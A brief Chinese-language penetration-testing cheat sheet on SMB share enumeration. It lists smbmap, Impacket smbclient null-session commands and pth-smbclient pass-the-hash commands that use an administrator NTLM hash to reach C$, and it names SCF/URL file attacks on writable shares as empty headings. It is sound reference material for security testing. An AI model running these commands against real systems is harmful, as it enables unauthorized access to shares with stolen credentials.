共享
某些共享无需身份验证即可访问,探索它们以找到一些有趣的文件smbmap
https://github.com/ShawnDEvans/smbmap
>smbmap -H 10.10.10.10
>smbmap -H 10.10.10.10 -R # 递归列表
>smbmap -H 10.10.10.10 -u invaliduser
>smbmap -H 10.10.10.10 -d "DOMAIN.LOCAL" -u "USERNAME" -p "Password123*"pth-smbclient from path-toolkit
https://github.com/byt3bl33d3r/pth-toolkit
>pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
>pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/C$
>ls # 列文件
>cd # 切换目录
>get # 下载
>put # 上传smbclient from Impacket
https://github.com/SecureAuthCorp/impacket
>smbclient -I 10.10.10.100 -L ACTIVE -N -U ""针对可写共享的 SCF 和 URL 文件攻击
SCF文件
URL文件
最后更新于
这有帮助吗?